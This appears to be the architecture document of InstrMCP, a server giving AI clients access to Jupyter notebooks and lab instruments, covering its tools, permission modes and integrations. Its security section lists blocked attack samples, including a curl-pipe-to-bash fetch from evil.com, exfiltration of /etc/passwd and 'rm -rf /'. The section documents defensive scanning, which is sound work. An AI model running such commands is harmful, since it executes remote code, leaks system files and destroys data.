Architecture

This document describes the technical architecture of InstrMCP, including package structure, communication flows, and integration patterns.

Package Structure

instrmcp/
├── servers/           # MCP server implementations
│   ├── jupyter_qcodes/ # Jupyter integration with QCodes instrument access
│   │   ├── mcp_server.py      # FastMCP server implementation
│   │   ├── tools.py           # QCodes read-only tools and Jupyter integration
│   │   ├── tools_unsafe.py    # Unsafe mode tools with registrar pattern
│   │   ├── cache.py           # Caching and rate limiting for QCodes parameter reads
│   │   ├── core/              # Core tool registrars (qcodes, notebook, resources)
│   │   ├── options/           # Optional features (measureit, database, dynamic_tool)
│   │   └── security/          # Security scanners and consent management
│   └── qcodes/        # Standalone QCodes station server
├── extensions/        # Jupyter/IPython extensions
│   └── jupyterlab/    # JupyterLab extension for active cell bridging
├── utils/             # Utility modules
│   ├── stdio_proxy.py # STDIO↔HTTP proxy for Claude Desktop/Codex integration
│   ├── metadata_config.py  # Metadata configuration loader
│   └── logging_config.py   # Logging configuration
├── config/            # Configuration files
│   └── metadata_baseline.yaml  # Default tool/resource descriptions (single source of truth)
└── cli.py             # Main command-line interface

Core Components

MCP Servers

servers/jupyter_qcodes/ - Main Jupyter integration server

mcp_server.py: FastMCP server implementation
tools.py: QCodes read-only tools and Jupyter integration
tools_unsafe.py: Unsafe mode tools (cell execution, manipulation)
cache.py: Thread-safe caching and rate limiting

servers/qcodes/ - Standalone QCodes station server

Independent server for QCodes instrument control
Can run separately from Jupyter

Communication Architecture

Claude Desktop/Code ←→ STDIO ←→ claude_launcher.py ←→ stdio_proxy.py ←→ HTTP ←→ Jupyter MCP Server

The system uses a proxy pattern:

External clients (Claude Desktop, Claude Code, Codex) communicate via STDIO
Launchers (agentsetting/claudedesktopsetting/claude_launcher.py, agentsetting/codexsetting/codex_launcher.py) bridge STDIO to HTTP
The actual MCP server runs as an HTTP server within Jupyter

QCodes Integration

Lazy Loading: Instruments loaded on-demand for safety
Professional Drivers: Full QCodes driver ecosystem support
Hierarchical Parameters: Support for nested parameter access (e.g., ch01.voltage)
Caching System: cache.py prevents excessive instrument reads
Rate Limiting: Protects instruments from command flooding

Jupyter Integration

IPython Event Hooks: Real-time tracking of cell execution
Active Cell Bridge: JupyterLab extension for current cell access
Kernel Variables: Direct access to notebook namespace
Cell Output Capture: Retrieves output from most recently executed cell

MCP Tools Available

All tools now use hierarchical naming with / separator for better organization.

QCodes Instrument Tools (`qcodes/*`)

qcodes/instrument_info(name, with_values, detailed) - Get instrument details; values included when with_values=true. Note: IDN parameter is filtered out from display.
qcodes/get_parameter_info(instrument, parameter, detailed) - Get metadata for a specific parameter (name, label, unit, vals/limits, gettable/settable; with detailed=True also includes scale, offset, cache)
qcodes/get_parameter_values(queries, detailed) - Read parameter values (supports both single and batch queries)

Jupyter Notebook Tools (`notebook/*`)

notebook/list_variables(type_filter) - List notebook variables by type
notebook/read_variable(name) - Detailed variable information
notebook/read_active_cell(fresh_ms) - Current JupyterLab cell content
notebook/read_active_cell_output() - Get output of the currently active cell
notebook/read_content(num_cells, include_output) - Get cells around cursor position
notebook/server_status() - Check server mode and status

Unsafe Notebook Tools (`notebook/*` - unsafe mode only)

notebook/execute_active_cell(timeout) - Execute current cell and return output (requires consent)
notebook/add_cell(cell_type, position, content) - Add new cell relative to active cell
notebook/delete_cell() - Delete the currently active cell (requires consent)
notebook/delete_cells(cell_numbers) - Delete multiple cells by number (requires consent)
notebook/apply_patch(old_text, new_text) - Apply text replacement patch to active cell (requires consent)

MeasureIt Integration Tools (`measureit/*` - requires `%mcp_option measureit`)

measureit/get_status(detailed) - Check if any MeasureIt sweep is currently running
measureit/wait_for_sweep(variable_name, timeout, all, kill, detailed) - Wait for sweep(s) to finish. When kill=true (default), automatically kills sweep to release resources after completion.
measureit/kill_sweep(variable_name, all) - Kill sweep(s) to release resources. When all=true, kills all sweeps.

Database Integration Tools (`database/*` - requires `%mcp_option database`)

database/list_experiments(database_path, scan_nested) - List all experiments in the specified QCodes database
database/get_dataset_info(id, database_path, code_suggestion) - Get detailed information about a specific dataset. If code_suggestion=True, generates sweep-type-aware Python code for loading the data.
database/get_database_stats(database_path) - Get database statistics and health information
database/list_available(detailed) - List all available QCodes databases across common locations

Note: All database tools accept an optional database_path parameter. If not provided, they default to $MeasureItHome/Databases/Example_database.db when MeasureIt is available, otherwise use QCodes configuration. database_list_experiments also accepts scan_nested to search nested Databases subdirectories under the MeasureIt data dir.

Code Suggestion: When code_suggestion=True, the get_dataset_info tool automatically detects MeasureIt sweep types (Sweep0D, Sweep1D, Sweep2D, SimulSweep) from metadata and generates appropriate loading code:

Sweep2D parent groups: Multiple Sweep2D runs in the same experiment are grouped together with code to load and stack all 2D data
SweepQueue batches: Consecutive runs launched by SweepQueue are grouped with batch loading code
Single sweeps: Individual measurements get type-specific code (time-based for Sweep0D, 1D arrays for Sweep1D, etc.)

MCP Resources Available

QCodes Resources

None. Use qcodes_instrument_info("*") to list instruments, then qcodes_instrument_info(name) for details.

Jupyter Resources

notebook_cells - All notebook cell contents

MeasureIt Resources (Optional - requires `%mcp_option measureit`)

measureit_sweep0d_template - Sweep0D code examples and patterns for time-based monitoring
measureit_sweep1d_template - Sweep1D code examples and patterns for single parameter sweeps
measureit_sweep2d_template - Sweep2D code examples and patterns for 2D parameter mapping
measureit_simulsweep_template - SimulSweep code examples for simultaneous parameter sweeping
measureit_sweepqueue_template - SweepQueue code examples for sequential measurement workflows
measureit_common_patterns - Common MeasureIt patterns and best practices
measureit_code_examples - Complete collection of ALL MeasureIt patterns in structured format

Database Resources (Optional - requires `%mcp_option database`)

None. Use database_list_experiments and database_get_dataset_info for database metadata.

Optional Features and Magic Commands

The server supports optional features that can be enabled/disabled via magic commands:

Safe/Unsafe/Dangerous Mode

%mcp_safe - Switch to safe mode (read-only access)
%mcp_unsafe - Switch to unsafe mode (allows cell manipulation and code execution)
%mcp_dangerous - Switch to dangerous mode (all consent dialogs auto-approved)

Mode	Command	Tools Available	Consent Required
Safe	`%mcp_safe`	Read-only tools	N/A
Unsafe	`%mcp_unsafe`	All tools	Yes
Dangerous	`%mcp_dangerous`	All tools	No (auto-approved)

Unsafe Mode Tools

Only available when %mcp_unsafe or %mcp_dangerous is active (requires consent in unsafe mode, auto-approved in dangerous mode):

notebook/execute_active_cell(timeout) - Execute code in the active cell and return output
- timeout: Max seconds to wait for completion (default: 30.0). If 0, fire-and-forget.
- Returns: status ("completed"/"error"/"timeout"/"no_wait"), executed (true/false/"unknown"), input, outputs, has_output, has_error, error
notebook/add_cell(cell_type, position, content) - Add new cells to the notebook
- cell_type: "code", "markdown", or "raw" (default: "code")
- position: "above" or "below" active cell (default: "below")
- content: Initial cell content (default: empty)
notebook/delete_cell() - Delete the active cell (clears content if last cell)
notebook/apply_patch(old_text, new_text) - Replace text in active cell
- Replaces first occurrence of old_text with new_text

Optional Features

Auto-Detection: When the extension loads, it automatically detects and enables available features:

measureit - Auto-enabled if MeasureIt package is installed
database - Auto-enabled if QCodes database support is available
auto_correct_json - Always auto-enabled (built-in feature)

Manual Control:

%mcp_option measureit - Enable MeasureIt template resources
%mcp_option -measureit - Disable MeasureIt template resources
%mcp_option database - Enable database integration tools and resources
%mcp_option -database - Disable database integration tools and resources
%mcp_option - Show current option status

Server Control

%mcp_start - Start the MCP server
%mcp_stop - Stop the MCP server
%mcp_restart - Restart server (required after mode/option changes)
%mcp_status - Show server status and available commands

Note: Server restart is required after changing modes or options for changes to take effect.

Tool Annotations

All MCP tools include annotations per the MCP specification (2025-06-18) to help AI models understand tool behavior:

Annotation Types

Annotation	Default	Description
`title`	-	Human-readable display name (e.g., "Get Instrument Info")
`readOnlyHint`	`false`	If `true`, tool doesn't modify state
`destructiveHint`	`true`	For write tools, if `true` may delete/destroy data
`idempotentHint`	`false`	If `true`, repeated calls have same effect
`openWorldHint`	`true`	If `true`, interacts with external systems

Tool Classification

Read-Only Tools (readOnlyHint: true):

All QCodes tools (qcodes_instrument_info, qcodes_get_parameter_info, qcodes_get_parameter_values)
All notebook read tools (notebook_list_variables, notebook_read_*, notebook_server_status)
All MeasureIt status tools, Database tools, Dynamic list/inspect/stats tools
Resource tools (mcp_list_resources, mcp_get_resource)

Write Tools - Non-Destructive (readOnlyHint: false, destructiveHint: false):

notebook_move_cursor, notebook_apply_patch
notebook_execute_active_cell (also openWorldHint: true - executes code)
notebook_add_cell
measureit_kill_sweep (stops running sweep, releases resources)
dynamic_register_tool, dynamic_update_tool

Destructive Tools (readOnlyHint: false, destructiveHint: true):

notebook_delete_cell, notebook_delete_cells
dynamic_revoke_tool

Benefits for AI Models

Efficiency: AI can identify safe read-only tools for exploration
Safety: Clients can warn before destructive operations
Retry Logic: Idempotent tools can be safely retried on failure
No Token Cost: Annotations are metadata, not part of the conversation

Configuration

Environment Variables

instrMCP_PATH: Optional path override for instrMCP installation
JUPYTER_MCP_HOST: MCP server host (default: 127.0.0.1)
JUPYTER_MCP_PORT: MCP server port (default: 8123)

Configuration

View configuration via: instrmcp config

Metadata Configuration

InstrMCP uses a two-layer metadata system for tool and resource descriptions exposed to AI models:

Baseline (instrmcp/config/metadata_baseline.yaml) - Default descriptions bundled with the package
User Overrides (~/.instrmcp/metadata.yaml) - Optional customizations that override the baseline

Final metadata = Baseline merged with User overrides

Architecture

┌─────────────────────────────────────────────────────────────┐
│                    Metadata Loading                          │
├─────────────────────────────────────────────────────────────┤
│  1. Load baseline from instrmcp/config/metadata_baseline.yaml│
│  2. Load user overrides from ~/.instrmcp/metadata.yaml       │
│  3. Merge: user overrides take precedence                    │
│  4. Apply to tools via FastMCP transformation API            │
│  5. Apply to resources via FunctionResource attributes       │
└─────────────────────────────────────────────────────────────┘

Baseline Configuration

The baseline file (instrmcp/config/metadata_baseline.yaml) contains all default tool and resource descriptions. This is the single source of truth for metadata - no descriptions are hardcoded in Python source files.

Location: instrmcp/config/metadata_baseline.yaml (bundled with package)

User Override Configuration

Users can customize metadata by creating an override file:

Location: ~/.instrmcp/metadata.yaml

version: 1
strict: true  # false = warn on unknown tools/resources instead of error

tools:
  qcodes_instrument_info:
    title: "Get Instrument Info"
    description: "Custom description for your lab setup."
    arguments:
      name:
        description: "Instrument name or '*' for all."

resource_templates:
  resource://measureit_sweep1d_template:
    description: "Custom Sweep1D description."

Resource Description Composition

For resources, the final description sent to the model is composed as:

{description}

When to use: {use_when}
Example: {example}

CLI Commands

Manage metadata configuration via the CLI:

Command	Description
`instrmcp metadata init`	Create default config with examples
`instrmcp metadata edit`	Open config in `$EDITOR`
`instrmcp metadata list`	Show all configured overrides
`instrmcp metadata show <name>`	Show specific tool/resource override
`instrmcp metadata path`	Show config file path
`instrmcp metadata validate`	Validate config against running server (via STDIO proxy)
`instrmcp metadata tokens`	Count tokens in tool/resource descriptions (requires `tiktoken`)

Validation via STDIO Proxy

The validate command tests the full communication path used by Claude Desktop/Codex:

CLI → STDIO → stdio_proxy → HTTP → MCP Server (8123)

This ensures that:

Your metadata config file is valid YAML with correct schema
All tools/resources referenced in your config exist on the running server
All argument names referenced in tool overrides are valid
The STDIO proxy correctly forwards metadata to MCP clients

Example usage:

# Start the MCP server first (in JupyterLab: %mcp_start)
instrmcp metadata validate

# With custom timeout
instrmcp metadata validate --timeout 30

# With explicit launcher path
instrmcp metadata validate --launcher-path /path/to/claude_launcher.py

Token Counting

The tokens command counts tokens used by metadata descriptions to help optimize context budget. By default it uses the Anthropic API (messages.count_tokens) for exact counts and falls back to tiktoken offline estimation if the API is unavailable.

# Count tokens (API by default, auto-fallback to tiktoken)
instrmcp metadata tokens

# Force offline estimation (no API calls)
instrmcp metadata tokens --offline

# Count tokens in merged config (baseline + user overrides)
instrmcp metadata tokens --source merged

# Output as JSON for programmatic use
instrmcp metadata tokens --format json

The standalone script is also available: python tools/token_count.py

Validation Modes

Strict mode (strict: true): Errors on unknown tools/resources - catches typos
Non-strict mode (strict: false): Warnings only - useful for dynamic tools

Security Features

YAML loaded with yaml.safe_load() to prevent code execution attacks
Config file created with 0o600 permissions (user read/write only)
Pydantic validation provides clear error messages for invalid config
Trailing whitespace automatically stripped from descriptions

How Overrides Are Applied

Server loads baseline config from package (instrmcp/config/metadata_baseline.yaml)
Server loads user overrides from ~/.instrmcp/metadata.yaml (if exists)
Configs are merged (user overrides take precedence for individual fields)
Tool metadata applied via FastMCP's add_tool_transformation() API
Resource metadata applied via direct FunctionResource attribute modification
Changes take effect immediately for that server session

Note: Server restart is required after modifying the user config file.

E2E Testing

The metadata e2e test (tests/playwright/test_metadata_consistency.py) automatically detects user config:

No user config: Uses metadata_snapshot.json (baseline reference)
With user config: Uses metadata_snapshot_user.json (user-specific reference)

# Verify metadata matches baseline
python tests/playwright/test_metadata_consistency.py --mode verify

# Create/update snapshot (auto-selects based on user config presence)
python tests/playwright/test_metadata_consistency.py --mode snapshot

Integration Patterns

Claude Desktop Integration

{
  "mcpServers": {
    "instrmcp-jupyter": {
      "command": "/path/to/your/python3",
      "args": ["/path/to/your/instrMCP/agentsetting/claudedesktopsetting/claude_launcher.py"],
      "env": {
        "PYTHONPATH": "/path/to/your/instrMCP",
        "instrMCP_PATH": "/path/to/your/instrMCP",
        "JUPYTER_MCP_HOST": "127.0.0.1",
        "JUPYTER_MCP_PORT": "8123"
      }
    }
  }
}

Claude Code Integration

claude mcp add instrMCP --env instrMCP_PATH=$instrMCP_PATH \
  --env PYTHONPATH=$instrMCP_PATH \
  -- $instrMCP_PATH/venv/bin/python \
  $instrMCP_PATH/agentsetting/claudedesktopsetting/claude_launcher.py

Codex CLI Integration

Command: python
Args: ["/path/to/your/instrMCP/agentsetting/codexsetting/codex_launcher.py"]
Env:
- JUPYTER_MCP_HOST=127.0.0.1
- JUPYTER_MCP_PORT=8123

Gemini CLI Integration

Gemini uses the same STDIO launcher as Claude Desktop (~/.gemini/settings.json):

{
  "mcpServers": {
    "instrMCP": {
      "command": "/path/to/your/python",
      "args": ["/path/to/your/instrMCP/agentsetting/claudedesktopsetting/claude_launcher.py"],
      "env": {
        "instrMCP_PATH": "/path/to/your/instrMCP",
        "PYTHONPATH": "/path/to/your/instrMCP"
      },
      "trust": true
    }
  }
}

Communication Flows

STDIO-based Clients (Claude Desktop, Claude Code, Codex)

Client ←→ STDIO ←→ Launcher ←→ stdio_proxy.py ←→ HTTP ←→ Jupyter MCP Server

Client sends MCP request over STDIO
Launcher receives request and forwards to stdio_proxy
stdio_proxy converts STDIO to HTTP request
HTTP server in Jupyter processes request
Response flows back through the same chain

Direct HTTP Clients

Client ←→ HTTP ←→ Jupyter MCP Server

Direct connection to the HTTP server running in Jupyter.

Server Lifecycle & Troubleshooting

MCP Server Lifecycle

The MCP server runs as an HTTP server within the Jupyter kernel process using uvicorn:

Start: Creates uvicorn Server instance with install_signal_handlers = lambda: None to prevent interference with ipykernel's ZMQ event loop
Run: Server runs in an asyncio task via uvicorn.Server.serve()
Stop: Sets server.should_exit = True for graceful shutdown, then cancels the task

Important: The signal handler override is critical - without it, repeated start/stop cycles corrupt ipykernel's ZMQ sockets.

Logging System

Logs are stored in ~/.instrmcp/:

~/.instrmcp/
├── logs/
│   ├── mcp.log              # Main server log (rotating, 10MB max)
│   ├── mcp_debug.log        # Debug log (when enabled)
│   └── tool_calls.log       # Tool invocations with timing
├── audit/
│   └── tool_audit.log       # Dynamic tool lifecycle
└── logging.yaml             # Configuration (optional)

Logger namespace: all loggers use lowercase instrmcp.* (legacy mixed-case names still map here).

Enable debug logging: Create/edit ~/.instrmcp/logging.yaml:

debug_enabled: true

Common Issues

"Socket operation on non-socket" Error

Cause: ZMQ socket corruption from improper uvicorn shutdown.

Solution: This was fixed by disabling uvicorn's signal handlers. If you encounter this error:

Click the "Reset" button in the toolbar
If that fails, restart the kernel

Toolbar Shows "Stopped" But Server Won't Start

Cause: Stale state after kernel restart.

Solution: Click the "Reset" button to reconnect the toolbar comm.

Tool Calls Not Appearing in Logs

Cause: tool_logging disabled or logger not initialized.

Solution: Ensure ~/.instrmcp/logging.yaml has tool_logging: true (default) and restart the kernel.

Security Architecture

The MCP server implements a multi-layer security model to prevent dangerous code execution and system compromise.

Security Layers

Code Input → IPython Scanner → AST Scanner → Consent Manager → Execution
                  ↓                ↓              ↓
              BLOCKED         BLOCKED        DECLINED

Layer 1: IPython Scanner (Pre-AST)

Catches shell injection attacks that bypass Python parsing:

Pattern	Risk Level	Example
Cell magics	CRITICAL	`%%bash`, `%%sh`, `%%script`
Shell escapes	CRITICAL/HIGH	`!source ~/.zshrc`, `!curl \| bash`
Config file sourcing	CRITICAL	`source ~/.bashrc`, `source ~/conda.sh`
get_ipython() bypass	CRITICAL	`get_ipython().system("...")`
Data exfiltration	CRITICAL	`!curl -d @/etc/passwd`

Why this matters: IPython cell magics like %%bash are processed before Python parsing, making them invisible to AST-based scanners. An attacker could inject:

%%bash
source ~/.zshrc  # Executes arbitrary code from shell config

Layer 2: AST Scanner

Detects dangerous Python patterns using Abstract Syntax Tree analysis:

Category	Patterns Detected
Code Execution	`eval()`, `exec()`, `compile()`
Builtins Access	`getattr(__builtins__, "eval")`, `globals()["exec"]`
Environment Modification	`os.environ[...] = ...`, `os.putenv()`
Process Execution	`os.system()`, `subprocess.run(shell=True)`
File Operations	`shutil.rmtree()`, writes to `/etc/`, `~/.ssh/`
Persistence	`crontab`, `systemctl`, `launchctl`
Deserialization	`pickle.load()`, `yaml.load()` without Loader

Alias-aware: Catches obfuscated patterns like:

from os import system as s
s("rm -rf /")  # Detected!

Layer 3: Consent Manager

For unsafe mode operations, user consent is required before execution:

notebook_execute_active_cell - Code execution
notebook_delete_cell - Cell deletion
notebook_apply_patch - Text replacement

Dangerous mode (%mcp_dangerous) auto-approves all consent dialogs.

Security Components

Located in instrmcp/servers/jupyter_qcodes/security/:

File	Purpose
`ipython_scanner.py`	Pre-AST detection of IPython magics and shell escapes
`code_scanner.py`	AST-based Python pattern detection
`consent.py`	User consent management for unsafe operations
`audit.py`	Security audit logging

Attack Vectors Blocked

Shell injection via cell magic

%%bash
source ~/.zshrc  # BLOCKED by IPython Scanner

Environment variable modification

os.environ["PATH"] = "/evil"  # BLOCKED by AST Scanner

Remote code execution

!curl https://evil.com/script.sh | bash  # BLOCKED by IPython Scanner

Obfuscated eval

getattr(__builtins__, "eval")("malicious")  # BLOCKED by AST Scanner

get_ipython() bypass

get_ipython().system("rm -rf /")  # BLOCKED by IPython Scanner

FilesExpand file tree

ARCHITECTURE.md

Latest commit

History

ARCHITECTURE.md

File metadata and controls

Architecture

Package Structure

Core Components

MCP Servers

Communication Architecture

QCodes Integration

Jupyter Integration

MCP Tools Available

QCodes Instrument Tools (qcodes/*)

Jupyter Notebook Tools (notebook/*)

Unsafe Notebook Tools (notebook/* - unsafe mode only)

MeasureIt Integration Tools (measureit/* - requires %mcp_option measureit)

Database Integration Tools (database/* - requires %mcp_option database)

MCP Resources Available

QCodes Resources

Jupyter Resources

MeasureIt Resources (Optional - requires %mcp_option measureit)

Database Resources (Optional - requires %mcp_option database)

Optional Features and Magic Commands

Safe/Unsafe/Dangerous Mode

Unsafe Mode Tools

Optional Features

Server Control

Tool Annotations

Annotation Types

Tool Classification

Benefits for AI Models

Configuration

Environment Variables

Configuration

Metadata Configuration

Architecture

Baseline Configuration

User Override Configuration

Resource Description Composition

CLI Commands

Validation via STDIO Proxy

Token Counting

Validation Modes

Security Features

How Overrides Are Applied

E2E Testing

Integration Patterns

Claude Desktop Integration

Claude Code Integration

Codex CLI Integration

Gemini CLI Integration

Communication Flows

STDIO-based Clients (Claude Desktop, Claude Code, Codex)

Direct HTTP Clients

Server Lifecycle & Troubleshooting

MCP Server Lifecycle

Logging System

Common Issues

"Socket operation on non-socket" Error

Toolbar Shows "Stopped" But Server Won't Start

Tool Calls Not Appearing in Logs

Security Architecture

Security Layers

Layer 1: IPython Scanner (Pre-AST)

Layer 2: AST Scanner

Layer 3: Consent Manager

Security Components

Attack Vectors Blocked

QCodes Instrument Tools (`qcodes/*`)

Jupyter Notebook Tools (`notebook/*`)

Unsafe Notebook Tools (`notebook/*` - unsafe mode only)

MeasureIt Integration Tools (`measureit/*` - requires `%mcp_option measureit`)

Database Integration Tools (`database/*` - requires `%mcp_option database`)

MeasureIt Resources (Optional - requires `%mcp_option measureit`)

Database Resources (Optional - requires `%mcp_option database`)